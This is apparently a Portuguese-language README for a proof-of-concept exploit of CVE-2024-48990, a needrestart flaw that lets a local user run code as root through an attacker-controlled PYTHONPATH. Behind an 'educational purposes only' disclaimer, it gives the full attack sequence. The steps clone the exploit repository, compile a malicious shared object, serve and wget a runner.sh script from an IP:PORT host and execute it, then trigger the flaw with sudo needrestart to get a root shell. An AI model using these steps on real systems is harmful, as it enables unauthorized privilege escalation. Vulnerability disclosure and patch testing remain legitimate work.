
PoC sobre CVE-2024-48990. A Qualys descobriu que o needrestart, antes da versão 3.8, permite que atacantes locais executem código arbitrário como root, enganando o needrestart para executar o interpretador Python com uma variável de ambiente PYTHONPATH controlada pelo atacante. (NIST)
[!WARNING] Estes arquivos e informações são destinados apenas para fins educacionais. O autor não é responsável por qualquer comportamento malicioso. Todas as informações fornecidas não têm a intenção de incitar qualquer tipo de crime ou abuso.
A Qualys descobriu que o needrestart, antes da versão 3.8, permite que invasores locais executem código arbitrário como root, enganando o needrestart para executar o interpretador Python com uma variável de ambiente PYTHONPATH controlada pelo invasor. Consulte o NIST para obter detalhes oficiais.
git clone https://github.com/grecosamuel/CVE-2024-48990.git
gcc -shared -fPIC -o __init__.so exploit.c
python3 -m http.server
wget http://IP:PORT/runner.sh
chmod +x runner.sh
./runner.sh
sudo needrestart
Quando ler [*] CVE module created pressione CTRL+C para parar o processo e obter seu shell!